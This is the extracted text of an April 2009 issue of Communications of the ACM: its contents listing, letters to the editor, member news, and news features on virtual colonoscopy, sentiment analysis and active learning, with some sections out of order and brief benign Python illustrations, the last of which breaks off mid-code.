Paper Submission: The Third ACM Conference on Recommender Systems builds on the success of the Recommenders ’06 Summer School in Bilbao, Spain, RecSys’07 in Minneapolis, USA, and RecSys’08 in Lausanne, Switzerland. Many members of the practitioner and research communities valued the rich exchange of ideas made possible by the shared plenary sessions at these events. The conference will promote the same close interaction among practitioners and researchers while reaching a wider range of participants, including those from Europe and Asia. Published papers will go through a full peer review process. The conference proceedings are expected to be widely read and cited. In addition to a regular technical program, there will be tutorials covering the state of the art of this domain, a doctoral consortium, an industrial program comprising keynote speakers and practice/industry-paper tracks, and special-topic workshops.
Innovative recommender applications
Novel paradigms of recommender systems
User modeling and recommender systems


Learning More About Active Learning 


Active learning algorithms are 
producing substantial savings 
in label complexity over passive 
learning approaches. 

By Graeme Stemp-Morlock 


Emerging Markets 

IT and the World’s “Bottom Billion” 
How can information technology be best applied to address problems and provide opportunities for inhabitants of the world’s poorest countries?

By Richard Heeks 


25


Kode Vicious 

System Changes and Side Effects 
Comparing the potential benefits 
of system changes that help and 
the detriments of changes made 
for the sake of change. 

By George V. Neville-Neil


14 


Our Sentiments, Exactly 

With sentiment analysis algorithms, 
companies can identify and assess 
the wide variety of opinions found 
online and create computational 
models of human opinion. 

By Alex Wright 
Did Somebody Say
Virtual Colonoscopy? 
Doctors are saving lives with virtual, 
3D exams that are less invasive than 
a conventional optical colonoscopy. 
By David Essex 


29 
Technology Strategy and Management
Strategies for Difficult (and Darwinian) Economic Times
How the axiom of survival of the fittest applies in the context of a global economic downturn.

By Michael Cusumano


Viewpoint 

Computing as Social Science 
Changing the way computer science 
is taught in college by encouraging 
students to develop solutions to 
socially relevant problems. 

By Michael Buckley 


19 


Time to Reboot 

A diverse, international group of 
more than 200 persons met at the 
Rebooting Computing Summit to 
address the problems confronting 
computer science. 

By Bob Violino 
VOL. 52


IT Ecosystem in Peril 
Experts warn the U.S. may soon 
relinquish its leadership role 
in IT research and development. 
By Alan Joch
Viewpoint

Research Evaluation for Computer Science
Reassessing the assessment criteria and techniques traditionally used in evaluating computer science research effectiveness.

By Bertrand Meyer, Christine Choppy,
Jorgen Staunstrup, and Jan van Leeuwen
36 Purpose-Built Languages
The ecosystem of purpose-built 
languages is a key part of 
systems development. 
By Mike Shapiro 


42 Cybercrime 2.0: When the Cloud Turns Dark
Web-based malware attacks are 
more insidious than ever. What can 
be done to stem the tide? 

By Niels Provos, Moheeb Abu Rajab, 
and Panayiotis Mavrommatis 


Dynamic languages provide a flavor of object-relational mapping that simplifies application code.

By Chris Richardson 
About the Cover:

Mikael Christensen, a Danish computer scientist and generative artist, created this 3D bridge using open source software he wrote and calls Structure Synth. When he is not generating art, he is creating bioinformatics tools as one of the founders of Molegro, developers of novel high-quality drug discovery and data mining software. For more information about Christensen and to experience more of his artwork, see http://blog.hvidtfeldts.net/.
Database and Information-Retrieval Methods for Knowledge Discovery
Comprehensive knowledge bases would tap the Web’s deepest information sources and relationships to address questions beyond today’s keyword-based search engines.

By Gerhard Weikum, Gjergji Kasneci, Maya Ramanath, and Fabian Suchanek
Roofline: An Insightful Visual Performance Model for Multicore Architectures
The Roofline model offers insight on how to improve the performance of software and hardware.

By Samuel Williams, Andrew Waterman, and David Patterson


A Direct Path to Dependable Software 
Who could fault an approach that offers 
greater credibility at reduced cost? 

By Daniel Jackson 
Technical Perspective

Disk Array Models for Automating 
Storage Management 
Integrating NAND Flash Devices onto Servers

By David Roberts, Taeho Kgil, 
and Trevor Mudge 
As with all magazines, page limitations often prevent the publication of articles that might otherwise be included in the print edition. To ensure timely publication, ACM created Communications’ Virtual Extension (VE).

VE articles undergo the same rigorous review process as those in the print edition and are accepted for publication on their merit. These articles are now available to ACM members in the Digital Library.
Technical Opinion
Online Auctions Hidden Metrics
Paulo Goes, Yanbin Tu, and Y. Alex Tung
education letter

Computing Education Matters

occurred at a time when there is a strong need to recruit more participants into the field and to engender an interest both in the discipline itself and in related innovation. For those of us in education, this downslide has been of great concern. Daunting challenges such as “transforming computing education” and “rebooting computing” (see story on page 19) are high on the agenda. ACM’s Education Board and Education Council, charged with promoting computer science education in every possible way, have made enrollment a key focus of attention.

For background, the Education Board has existed within ACM for over three decades. Over the years, the Board has initiated important education activities regarding computer science curriculum developments and has provided support and encouragement for projects such as Eric Roberts’s noted work on the Java Task Force, Peter Denning’s work on Great Principles, and Lillian Cassel’s work on ontology.

Over the last four years, the Board’s activities were restructured and the ACM Education Council was born to bring together the educational and accreditation activities existing throughout ACM’s various committees, task forces, and special interest groups. Part of the strategy for revamping the Education Board and the Education Council was to include greater industry representation. Due to this realignment, the work of the Education Board itself was reshaped with considerable emphasis on managing the work of the Education Council.

The Education Council meets about every eight months to keep members abreast of the educational concerns of industry and high-school teachers, as well as those involved in K-12 education. The Education Council also keeps track of the activities of professional bodies such as the National Science Foundation and NCWIT. Moreover, a vital role for the Education Council is to adopt an international perspective in identifying the concerns in computing education and to respond by undertaking activities that will ideally have a positive impact.

Some of the recent accomplishments of the Education Board and the Education Council include:

» The completion of a major undertaking in curriculum guidance in the form of the five volumes of CC2001, namely in Computer Science (2001, with an update in 2008); Information Systems (2002); Software Engineering (2004); Computer Engineering (2004); and Information Technology (2009). The board also finalized an Overview Report (2006) on this project (see ACM Educational Activities).

» Producing and distributing approximately one million copies of a brochure promoting the many positive images of computing to middle- and high-school students. The brochure and accompanying Web site were designed, with support from the Computer Science Teachers Association (CSTA), to increase the visibility of computer science in an encouraging way to a young audience.

» Supporting ACM’s Journal of Educational Resources in Computing (JERIC) as it transformed into Transactions on Computing Education, with a first issue due this month.

» Creating a comprehensive chart of all the educational activities and initiatives within ACM and making it widely available.

» Supporting an initial computing education summit in China as well as a number of European conferences under the auspices of Informatics Education Europe.

Together, ACM’s Education Board and Education Council have established an effective pattern of activities and accomplishments among their many programs and initiatives. Their primary activities of curricular guidance will continue and even expand. Working closely with CSTA and K-12 is vital to move educational initiatives in the upward direction. Above all, the Education Board must continue to ensure there is an international perspective and a leadership dimension to its activities. All of these programs and more will be summarized twice a year in inroads, the quarterly publication from ACM’s special interest group on computer science education (SIGCSE).

While successes have been many, there are still many challenges ahead for the education community. Projects and initiatives designed to reverse declining enrollment in computing disciplines must proliferate and prevail if we are to succeed in stemming the enrollment downturn. One potential catalyst for the cause will be the adoption of new technological developments (for example, involving multi-core processors, IBM’s racetrack memory, and vastly enhanced levels of interconnectivity) that are poised to transform the computing community and those drawn to it. As always, ACM will be at the forefront, continually revitalizing its Education Board and the Education Council and seeking new and inspiring ways to address the challenges of the day.
ACM, Uniting the World’s Computing Professionals,
Dear Colleague,

At a time when computing is at the center of the growing demand for technology jobs worldwide, ACM is continuing its work on initiatives to help computing professionals stay competitive in the global community. ACM’s increasing involvement in initiatives aimed at ensuring the health of the computing discipline and profession serves to help ACM reach its full potential as a global and diverse society, one that continues to offer new and unique opportunities for its members.
Please take a moment to consider the value of an ACM membership for your career and your future in the dynamic computing profession.
letters to the editor


DOI:10.1145/1498765.1498769 


What Role for Computer Science 
in the War on Terror? 


THE CONTRIBUTED ARTICLE “The Topology of Dark Networks” by Jennifer Xu and Hsinchun Chen (Oct. 2008) ignored sensitive cultural issues while addressing a subject that might by itself offend some people in Muslim societies, including those in the Middle East. The software system it described for fighting what some might call “Islamic terrorism” represents a highly charged political subject. A more appropriate place to publish would have been in a publication sponsored by, say, the U.S. Department of Defense, Central Intelligence Agency, or Federal Bureau of Investigation. ACM, which claims to be independent, with a clear mission to advance computer science while being open to members from around the world and free of geographic, ethnic, religious, or political affiliations, should stick to this mission and not involve itself in the so-called War on Terror.

Science is a universal language that should be used to bridge gaps between cultures, promote understanding and cooperation, and avoid worsening damage caused by politicians who push the world toward trouble. ACM should not take on such a sensitive subject that only increases tensions and does not make the world a better place.

This is my personal opinion. I would not seek to impose it on or cause offense to anyone.

Othman El Moulat, Rabat, Morocco


Xu Responds: 
We apologize if our article appeared to be targeting particular groups. This was certainly not our intent. Our research tried to address the new Dark Network phenomenon using selected examples and available datasets. Our hope is to develop advanced, science-based, data-driven intelligence and security-informatics techniques that help analyze and understand illicit covert communication and interaction networks. We agree that computing research should not be used for political purposes. We also hope that our research supports the study and understanding of deeply complex social phenomena.

Jennifer Xu, Waltham, MA 

Hsinchun Chen, Tucson, AZ 


What Gates’s Most
Enduring Legacy Should Be

Michael Cusumano’s Viewpoint column “Technology Strategy and Management” on “The Legacy of Bill Gates” (Jan. 2009) displayed a rather stunning values system by saying that “grow[ing] the PC software business... should be Gates’ most enduring legacy.” This is not a prediction of what will be Gates’s most enduring legacy, though on this issue I would differ as well. Rather, it is a normative statement of what should be his most enduring legacy. Does Cusumano really hope that the massive changes now under way in international public health will not endure? His conclusion should not have been so surprising after he referred to Gates’s philanthropy as “highly laudable” but only in the context of bemoaning what a distraction it had become from his business interests. I still found my jaw dropping at the word “should.”
Max Hailperin, St. Peter, MN 


NP-Completeness Not the Same
as Separating P from NP

In his news story “The Limits of Computability” (Nov. 2008) David Lindley wrote: “Showing that a problem is NP-complete means proving that no known algorithm can solve it in polynomial time.”

In fact, saying that a problem is NP-complete means only that it is “as hard as” any other problem in NP. Lindley apparently confused the definition of NP-completeness with the problem of separating P from NP. Such an error may be pardoned, even overlooked, in the science columns of a general-interest newspaper or magazine, but not in Communications.

Madhavan Mukund, Chennai, India 


Lindley Responds: 
Mukund is correct; this was a slip-up, though one that’s easily rectified.

In its earlier paragraphs, the story defined an NP problem as one for which no polynomial-time solution is known, then explained the distinction between NP and NP-complete, but in introducing the unresolved question of whether P and NP are truly distinct, I should have referred to NP problems generally, not NP-complete problems in particular. With this in mind, the paragraph in question would read correctly.

David Lindley, Alexandria, VA 
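For reference, the standard textbook definition that both letters turn on can be written out explicitly. Here \le_p denotes a polynomial-time many-one (Karp) reduction; this notation is the usual convention and is not taken from the original story.

```latex
% A decision problem L is NP-complete exactly when both conditions hold:
%   (1) L is itself in NP, and
%   (2) every problem L' in NP reduces to L in polynomial time ("as hard as").
L \text{ is NP-complete} \iff
  L \in \mathrm{NP} \;\wedge\; \forall L' \in \mathrm{NP} :\; L' \le_p L

% Consequence: a polynomial-time algorithm for any single NP-complete problem
% would collapse the two classes, which is why the open question is P vs. NP.
\bigl(\exists L \text{ NP-complete} : L \in \mathrm{P}\bigr) \implies \mathrm{P} = \mathrm{NP}
```

Neither condition mentions which algorithms are currently known. That is the distinction Mukund draws between NP-completeness and the separate question of whether P equals NP.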


Communications welcomes your opinion. To submit a 
Letter to the Editor, please limit your comments to 500 
words or less and send to letters@cacm.acm.org. 


Coming Next Month in 


COMMUNICATIONS 


Security in the Browser 


Spending Moore’s Dividend 


Computing Needs Time 


Debugging AJAX 


Algorithmic System Biology 


Plus the latest news on compressive sampling, computational advertising, and international education.
An Ongoing Study in Usability


The new Communications Web site went live last month after several weeks of in- 
tense beta testing. While we gleaned many valuable insights and lessons in this 
process, several highlights and user comments do stand out: 
» Testers spent an impressive 12 minutes on the beta site before it was even in full swing, making it nine seconds shy of Top 10 rankings tracked by Nielsen/NetRatings in March 2006.

» While Communications’ site may illustrate some user preferences for print v. digital, print is still strong. At press time, Google Analytics usage statistics showed the Communications magazine archive was among the top five destinations ranked by page views, just ahead of the February 2009 edition.

» The latest batch of mobile devices is putting the design model for Communications’ site to the test. One user requested a single, narrow-column layout for his small mobile screen; another commented on the scrolling required to view the site from his laptop.

» Even when beta-testers were prompted with such typical fighting words as “make bug-reporting a priority,” the response was blissful. “I did not react immediately because I did not have any criticism,” said one tester. “I must say, it is impressive.”
ACM Member News


GRANDISON WINS AWARDS 
Tyrone W. A. Grandison, leader of IBM Almaden Research Center’s Intelligent Information Systems team and an ACM Senior Member, was named Pioneer of the Year by the National Society of Black Engineers. He was also named Modern-Day Technology Leader by the Black Engineer of the Year Global Competitiveness STEM Board. “I think [I won the awards] because I am willing to explore new areas every 12 to 15 months,” Grandison said in an email interview. “My tendency is to look for emerging issues, define the pertinent problems, and actively seek to solve them.”


KIESLER RECEIVES SIGCHI AWARD

Carnegie Mellon University professor Sara Kiesler won SIGCHI’s Lifetime Achievement Award. “Sara’s research in HCI has illuminated many of the most significant social impacts of computing, such as: ‘flaming,’ social equalization, open communication, electronic groups, information sharing, and distributed collaboration,” noted SIGCHI in the award announcement. “She brought concepts from social psychology and HCI to robotics, helping to create the new interdisciplinary field of human-robot interaction.”


SIGIR ’09 INDUSTRY TRACK
Aiming to bridge the gap between research and practice, a full-day Industry Track will be held at SIGIR ’09, which takes place in Boston, MA, from July 19-23. “The SIGIR ’09 Industry Track brings together researchers and practitioners in the area that most defines our information age: information retrieval,” said Daniel Tunkelang, the Industry Track chair, in an email interview. “This assembly of the leading lights from industry (Google’s Matt Cutts, Microsoft’s danah boyd, and the leading enterprise search vendors, Autonomy, Endeca, and FAST) offers an unprecedented opportunity for everyone to learn about the science and technology of real-world information retrieval in a vendor-neutral, analyst-neutral setting.”


News 


Did Somebody Say 
Virtual Colonoscopy? 


Doctors are saving lives with virtual, 3D exams that 
are less invasive than a conventional optical colonoscopy. 


MOST PEOPLE OVER 50 years old ignore their doctor’s advice and forgo the standard, invasive test that screens for colorectal cancer and precancerous growths. Fortunately, a computer-based, noninvasive alternative to the conventional optical colonoscopy, known as virtual colonoscopy, is changing people’s attitudes, and it could save tens of thousands of lives each year.

A virtual colonoscopy starts with computed tomography (CT), a common diagnostic technology that uses X-rays to record cross-sectional, 2D images of the body’s interior. A 3D model is constructed by segmenting the colon from the rest of the abdomen and using an electronic cleansing algorithm to factor out fecal material. Next, doctors use visualization software to navigate a virtual fly-through of the colon. If a polyp or suspicious growth is found, doctors can perform a virtual biopsy and investigate further.

The case for a convenient mass-screening method is strong, says Arie Kaufman, chair of the computer science department at New York’s Stony Brook University. Colorectal cancer is the third most common cancer and the second leading cause of cancer deaths in the U.S., with more than 140,000 new cases and more than 50,000 deaths a year. “If all patients 50 years of age and older will participate in these screening programs, over 92% of colorectal cancer will be prevented and over 600,000 lives could be saved worldwide every year,” Kaufman says.

Virtual colonoscopies became possible in the mid-1990s, when Kaufman and others developed volume-rendering techniques that enabled 3D, virtual fly-throughs and associated tools, which were soon commercialized.


A screenshot of a user interface for virtual colonoscopy and computer-aided detection. 
Virtual colonoscopies have recently earned the imprimatur of the medical establishment, which prefers the formal term CT colonography. In a study at U.S. military hospitals, 1,233 symptomless subjects underwent a virtual colonoscopy, followed by a conventional optical colonoscopy, on the same day. The virtual colonoscopy results, reported in the New England Journal of Medicine in 2003, showed 94% sensitivity (the share of real polyps found) and 96% specificity (the share of polyp-free cases correctly cleared, which corresponds to a false-positive rate of about 4%) for polyps 8mm and larger. These numbers are comparable to those of optical colonoscopy, the gold standard among doctors. Subsequently, the U.S. Food and Drug Administration approved virtual colonoscopy for colon cancer screening.
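Sensitivity and specificity are easy to confuse, and specificity is not itself a false-positive rate. The minimal Python sketch below shows how both figures, along with the false-positive rate, are computed from a confusion table. The class name and the counts are hypothetical, chosen only so that the arithmetic reproduces the 94% and 96% figures quoted above. They are not the study’s data.

```python
from dataclasses import dataclass


@dataclass
class Confusion:
    """Counts from comparing a screening test against a reference standard."""
    true_pos: int   # polyp present, test flagged it
    false_neg: int  # polyp present, test missed it
    true_neg: int   # no polyp, test cleared the case
    false_pos: int  # no polyp, test flagged it anyway

    def sensitivity(self) -> float:
        # Share of real polyps the test finds: TP / (TP + FN)
        return self.true_pos / (self.true_pos + self.false_neg)

    def specificity(self) -> float:
        # Share of polyp-free cases correctly cleared: TN / (TN + FP)
        return self.true_neg / (self.true_neg + self.false_pos)

    def false_positive_rate(self) -> float:
        # FP / (FP + TN), which always equals 1 - specificity
        return self.false_pos / (self.false_pos + self.true_neg)


# Hypothetical counts for illustration only; not taken from the study.
c = Confusion(true_pos=47, false_neg=3, true_neg=960, false_pos=40)
print(f"sensitivity={c.sensitivity():.2f}")
print(f"specificity={c.specificity():.2f}")
print(f"false-positive rate={c.false_positive_rate():.2f}")
```

The last method makes explicit that a 96% specificity leaves a 4% false-positive rate.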

Virtual colonoscopy outperforms optical colonoscopy in certain ways, advocates claim. A University of Wisconsin study, for example, found it better at finding 8mm and 10mm polyps. It also outperforms optical colonoscopy in finding polyps hidden in folds and around corners of the twisting tube of the colon, and in reliably reaching the colon’s farthest end, called the caecum. It can also do something optical colonoscopy, by its nature, cannot do: spot polyps on the colon’s outer walls.

Also, because it is noninvasive, a virtual colonoscopy avoids the risk of the rare but deadly tears or holes that can occur during an optical colonoscopy (and which can require immediate surgery). “The examination is done on the data, rather than the patient,” says Dr. C. Daniel Johnson, a principal investigator at the Mayo Clinic in Scottsdale, AZ, and the lead researcher on several studies.

Virtual colonoscopy’s only significant health risk is a patient’s exposure to radiation. This trade-off


SCREENSHOT COURTESY OF ARIE E. KAUFMAN


the number of adjectives in a sentence.) Using these and other criteria, sentiment analysis algorithms can then begin to create computational models of human opinion.

Complicating matters even further are questions of context (who’s speaking, and to whom?) and linguistic nuances like slang and ambiguity. A “bad motorcycle” might actually be a good one, whereas a “bad movie” is probably just plain bad. Sentiment analysis algorithms sometimes have to go beyond literal interpretations of a text to discern an author’s original intent. Given the wide variety of idiomatic writing on the Web, this is no small task. As Grimes notes, “You don’t see ‘Genistein inhibits protein histidine kinase...Not!’ in a scientific paper.”
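To see why literal, keyword-level scoring struggles with cases like these, here is a deliberately naive sketch that sums word polarities from a small hand-written lexicon. The lexicon, its weights, and the function name `naive_polarity` are illustrative assumptions. They do not represent any vendor’s method.

```python
import re

# Toy polarity lexicon: words and weights are illustrative assumptions only.
LEXICON = {"good": 1, "great": 1, "love": 1, "bad": -1, "hated": -1, "boring": -1}


def naive_polarity(text: str) -> int:
    """Sum word-level polarity scores, ignoring context entirely."""
    words = re.findall(r"[a-z']+", text.lower())
    return sum(LEXICON.get(word, 0) for word in words)


for phrase in ["a bad movie", "a bad motorcycle", "I'm putting on two pairs of socks"]:
    print(phrase, "->", naive_polarity(phrase))
```

The sketch gives “a bad motorcycle” the same negative score as “a bad movie” and rates the two-pairs-of-socks remark as neutral. Handling such cases is what pushes real systems toward context and linguistic analysis.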


Mining Collective Opinions 

“With opinions, so much depends on the point of view of the user,” says David Pierce, chief technology officer of Jodange, whose sentiment analysis software grew out of a research project by Claire Cardie at Cornell University and Jan Wiebe at the University of Pittsburgh. Drawing on a body of theory in linguistics, philosophy, and computational linguistics, their team developed an algorithm that tries to determine the context of any particular statement by isolating three key data points: the topic, the opinion holder, and the opinion itself. First, the algorithm employs an entity extraction routine that locates keywords to identify particular topics and opinion holders. Next, it layers that data onto a linguistic analysis of the opinion being expressed. The resulting unit of data is a triple consisting of opinion, opinion holder, and topic. These triples are then stored in a relational database, where they can be cross-referenced across multiple documents to create what Jodange vice president of product management and marketing Pia Chong calls a “walled garden of opinion.”
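The triple-and-database design described above can be sketched with Python’s built-in `sqlite3` module. This is a hypothetical illustration, not Jodange’s schema. It assumes the entity extraction and linguistic analysis steps have already produced each (opinion, holder, topic) triple. The table name, the `doc_id` column, and the sample data are invented for the example.

```python
import sqlite3
from dataclasses import dataclass


@dataclass(frozen=True)
class OpinionTriple:
    opinion: str  # polarity label assumed to come from the linguistic analysis
    holder: str   # who expresses the opinion (from entity extraction)
    topic: str    # what the opinion is about (from entity extraction)
    doc_id: str   # hypothetical source-document id used for cross-referencing


def store(conn, triples):
    """Persist triples in a simple relational table (hypothetical schema)."""
    conn.execute(
        "CREATE TABLE IF NOT EXISTS opinions "
        "(opinion TEXT, holder TEXT, topic TEXT, doc_id TEXT)"
    )
    conn.executemany(
        "INSERT INTO opinions VALUES (?, ?, ?, ?)",
        [(t.opinion, t.holder, t.topic, t.doc_id) for t in triples],
    )


def opinions_about(conn, topic):
    """Cross-reference all stored opinions on one topic across documents.

    Returns (opinion, mention count, distinct document count) rows.
    """
    return conn.execute(
        "SELECT opinion, COUNT(*), COUNT(DISTINCT doc_id) FROM opinions "
        "WHERE topic = ? GROUP BY opinion ORDER BY opinion",
        (topic,),
    ).fetchall()


conn = sqlite3.connect(":memory:")
store(conn, [
    OpinionTriple("positive", "reviewer A", "phone", "doc1"),
    OpinionTriple("negative", "reviewer B", "phone", "doc2"),
    OpinionTriple("positive", "blogger C", "phone", "doc3"),
    OpinionTriple("negative", "reviewer A", "laptop", "doc1"),
])
print(opinions_about(conn, "phone"))
```

Keeping the source document on every row is what lets a single topic be cross-referenced across documents with an ordinary GROUP BY query.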

By connecting opinions from multiple sources about a particular topic, the application can provide users with a bird’s-eye view of that topic, presented in a variety of different formats: straightforward lists, heat maps that show the concentration of opinions on particular topics, an opinion index that calculates positive or negative trends, or a so-called Doppler view that shows a graphical summary of opinion data. The company is currently working on a new predictive model that could use opinion data to predict future developments, such as the impact of written opinion on trends in a company’s stock price.

A number of other companies, including Attensity, Clarabridge, Lexalytics Limited, SPSS, and TEMIS, are now developing their own proprietary versions of sentiment analysis software. All of these products employ some combination of keyword extraction and linguistic analysis to provide their customers with a particular understanding of collective opinion. Some of these products are targeted toward business applications, others toward consumer-facing Web applications.

For consumers, the most obvious applications for sentiment analysis involve enhancing search engines with more opinion data. “Sentiment analysis software could enable a much smoother user experience” for consumer research, says Pang. Microsoft’s Product Search, which is part of Live Search, and Yelp’s review highlights, which include phrases automatically extracted from user reviews, already rely on basic sentiment analysis to enhance their search results. Such interactions could eventually find their way into the general Web search experience. Pang suggests that such interactions could be fine-tuned for users at different stages of the research process, allowing them to narrow down from reviews of a product category to comparisons between products, then finally to in-depth product reviews.

APRIL 2009

Beyond the realm of consumer products, Pang also sees opportunities for sentiment analysis to shape the way people consume news. “When the media is having a field day, [users] might want to get a digest of different perspectives on the breaking news with analysis.” Similar applications might eventually lead to new types of interfaces where readers could track the movement of opinion about particular stories over time.
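One simple way to turn opinion data into a trend line that readers could follow over time is a per-day net-sentiment index, shown in the hypothetical sketch below. The formula (positive minus negative, divided by the total) is an assumption made for illustration. The article does not say how any vendor computes its opinion index.

```python
from collections import defaultdict
from datetime import date


def opinion_index(observations):
    """Net sentiment per day: (positive - negative) / total, in [-1, 1].

    `observations` is an iterable of (day, polarity) pairs, where polarity is
    +1 for a positive opinion and -1 for a negative one; zero is ignored.
    The formula is an illustrative assumption, not a documented vendor metric.
    """
    pos = defaultdict(int)
    neg = defaultdict(int)
    for day, polarity in observations:
        if polarity > 0:
            pos[day] += 1
        elif polarity < 0:
            neg[day] += 1
    days = sorted(set(pos) | set(neg))
    return [(d, (pos[d] - neg[d]) / (pos[d] + neg[d])) for d in days]


# Hypothetical opinions about one news story over three days.
obs = [
    (date(2009, 3, 1), +1), (date(2009, 3, 1), +1), (date(2009, 3, 1), -1),
    (date(2009, 3, 2), -1), (date(2009, 3, 2), -1), (date(2009, 3, 2), +1),
    (date(2009, 3, 3), -1),
]
for day, score in opinion_index(obs):
    print(day.isoformat(), round(score, 2))
```

Normalizing by the daily total keeps busy and quiet days on the same scale, so the direction of movement stays comparable even when coverage volume swings.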

That kind of opinion-trending insight is particularly valuable to users working in business or government. These potential users might include business intelligence professionals, market researchers, or public relations specialists. Today, sentiment analysis vendors are already marketing their products to companies in the form of hosted services that provide opinion dashboards and other management tools. At this stage, sentiment analysis software is too new to have penetrated most IT firewalls. Eventually, however, companies may start exploring how to integrate sentiment analysis data with their core management systems. “Unified analysis is coming,” says Grimes, “but it’s not here yet.”

Attensity is taking a step in that direction by marketing a suite of tools designed to help companies integrate sentiment analysis data with their internal business operations. In addition to providing sentiment analysis data, Attensity provides mechanisms for funneling that data into operational “queues” like marketing campaigns or call center scripts. “For example, if a valuable customer is upset they can route them to a special marketing campaign that compensates them through points or other things of value,” explains Michelle de Haaff, Attensity’s vice president of marketing and products.
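The routing example in that quote can be illustrated with a small rule-based sketch. Everything here is hypothetical: the `CustomerSignal` fields, the thresholds, and the queue names are invented to mirror the quoted example and do not describe Attensity’s actual product.

```python
from dataclasses import dataclass


@dataclass
class CustomerSignal:
    customer_id: str
    lifetime_value: float  # hypothetical measure of how valuable the customer is
    sentiment: float       # hypothetical score from -1.0 (upset) to +1.0 (happy)


def route(signal: CustomerSignal,
          value_threshold: float = 1000.0,
          upset_threshold: float = -0.5) -> str:
    """Pick a hypothetical operational queue for one customer opinion."""
    upset = signal.sentiment <= upset_threshold
    if upset and signal.lifetime_value >= value_threshold:
        # Valuable and upset: compensate through points or other value.
        return "retention-campaign"
    if upset:
        # Upset but lower value: hand off to a call-center script.
        return "call-center-followup"
    return "no-action"


signals = [
    CustomerSignal("c1", 5000.0, -0.8),
    CustomerSignal("c2", 200.0, -0.9),
    CustomerSignal("c3", 5000.0, 0.6),
]
for s in signals:
    print(s.customer_id, route(s))
```

The rules are checked in order, so a valuable, upset customer reaches the compensation queue before the more generic follow-up rule can claim them.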

As sentiment analysis finds its way into the business mainstream, vendors will likely continue to develop similar services that bring sentiment analysis into the IT mainstream. Once that integration starts to happen, companies will be able to feed opinion data into core business processes that can help them strengthen their customer relationships and, ultimately, boost profits: a decidedly unsentimental goal.


Alex Wright is a writer and information architect who lives 
and works in New York City. 
Our Sentiments, Exactly

With sentiment analysis algorithms, companies can identify and assess the wide variety of opinions found online and create computational models of human opinion.

FACTS MAY BE stubborn things, as John Adams once put it, but at least they’re easy to compute. From a data-processing perspective, opinions are much more stubborn.

In recent years, the Web has created a bull market in human opinion: movie reviews, product ratings, restaurant recommendations, and all kinds of other viewpoints expressed in articles, blogs, discussion groups, and elsewhere. As the Web accumulates more and more data, many of us rely on each other’s opinions as a filter to help us make informed decisions. For many businesses, customer opinions have become a type of virtual currency that can make or break their products. As opinion data plays an increasingly important role on the Web, however, computer scientists are discovering the limitations of traditional text analytics algorithms for sorting opinions from raw facts.

The distinction between facts and opinions might seem clear enough on the surface, but in practice teasing them apart involves parsing many linguistic shades of gray. This is where the emerging field known as sentiment analysis comes in. Sometimes called opinion mining or subjectivity analysis, sentiment analysis is a new term that broadly refers to the identification and assessment of opinions, which for the purposes of computation might be defined as written expressions of subjective mental states.

Traditional text analytics algorithms work by scanning a body of text to extract and analyze keywords. That approach works well for identifying simple factual statements, but assessing opinions requires delving much deeper into the subtleties of human language. “Sentiments are very different from conventional facts,” says analytics consultant Seth Grimes. While direct expressions of opinion are fairly easy to spot (for example, “I hated Revenge of the Sith”), most human sentiments fall somewhere along a continuum from objective fact to subjective experience. For example, “It’s fifteen degrees outside” is an objective statement; “It’s cold” reveals a somewhat more subjective point of view; while “I’m putting on two pairs of socks” constitutes a completely indirect expression of opinion disguised as a statement of fact.

An example of sentiment analysis from Michael Gamon in which topics from reviews of the Volkswagen Golf are depicted. The size of each topic box indicates the number of mentions of the topic, and the shading of each topic box indicates the average sentiment, ranging from negative (red) to neutral/none (white) to positive (green).

“We are dealing with sentiment that can be expressed in subtle ways,” says Yahoo! researcher Bo Pang, co-author of the book Opinion Mining and Sentiment Analysis. To penetrate those subtleties, sentiment analysis algorithms assess written statements through a series of overlapping filters. They usually begin by attempting to determine the polarity of a particular sentiment: is it positive or negative? Once that’s established, they may try to determine the intensity of the sentiment being expressed: how positive or negative is this statement? Next, an even more subtle layer of analysis might attempt to determine the degree of subjectivity: how partial or impartial is the point of view being expressed here? (This is often determined by looking at
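To make the sequence of filters concrete, here is a minimal lexicon-based sketch in Python. It is not how any vendor or researcher mentioned here does it: the word scores in `LEXICON`, the point-of-view words in `SUBJECTIVE_MARKERS`, and the function name `analyze` are all hypothetical, and real systems typically learn such scores from labeled data rather than hard-coding them. Polarity is taken as the sign of the summed word scores, intensity as its magnitude, and subjectivity is approximated as the share of tokens that are opinion words or first-person markers.

```python
# A toy, lexicon-based sketch of the polarity -> intensity -> subjectivity filters.
# LEXICON and SUBJECTIVE_MARKERS are hypothetical, hand-picked for illustration only.
LEXICON = {
    "hated": -3, "awful": -3, "bad": -2, "cold": -1,
    "good": 2, "great": 3, "loved": 3,
}
SUBJECTIVE_MARKERS = {"i", "i'm", "me", "my", "we", "think", "feel"}


def analyze(sentence: str) -> dict:
    """Run three overlapping filters over one sentence."""
    # Lowercase and strip surrounding punctuation; inner apostrophes are kept.
    tokens = [t.strip(".,!?\"'").lower() for t in sentence.split()]
    tokens = [t for t in tokens if t]
    total = sum(LEXICON.get(t, 0) for t in tokens)

    # Filter 1: polarity (is it positive or negative?).
    if total > 0:
        polarity = "positive"
    elif total < 0:
        polarity = "negative"
    else:
        polarity = "neutral"

    # Filter 2: intensity (how positive or negative is it?).
    intensity = abs(total)

    # Filter 3: subjectivity, approximated as the share of opinion-bearing tokens.
    opinionated = sum(1 for t in tokens if t in LEXICON or t in SUBJECTIVE_MARKERS)
    subjectivity = round(opinionated / len(tokens), 2) if tokens else 0.0

    return {"polarity": polarity, "intensity": intensity, "subjectivity": subjectivity}


for s in ["I hated Revenge of the Sith", "It's fifteen degrees outside",
          "It's cold", "I'm putting on two pairs of socks"]:
    print(s, "->", analyze(s))
```

Run on the article’s own examples, the direct opinion comes out negative while the socks sentence comes out neutral, which illustrates the point above: a keyword lexicon alone cannot see an opinion disguised as a statement of fact.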
dom, and future data distributions might differ sharply from the labeled examples selected by the algorithm.

To correct the sampling bias, or generalization error, Daniel Hsu, a Ph.D. student at the University of California, San Diego, and Dasgupta recommended a scheme where each chosen example has an importance weighting determined by its selection probability: each example is weighted by the inverse of the probability with which it was chosen, so less likely points receive higher weightings and more likely points receive lower weightings. As a result, the algorithm could realize when it had selected an unlikely point that was very informative and correct its expectations for any future data.
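The reweighting idea can be illustrated with a short Python sketch of inverse-probability (importance) weighting. It assumes the learner decides to request each label independently with a known probability `p`; how `p` is chosen, the helper name `importance_weighted_mean`, and the data are assumptions for illustration, not Hsu and Dasgupta’s actual scheme. Dividing each requested loss by `p` makes the weighted average an unbiased estimate of the average over all examples, even though unlikely points are rarely requested.

```python
import random
from typing import Sequence, Tuple


def importance_weighted_mean(
    losses: Sequence[float], probs: Sequence[float], rng: random.Random
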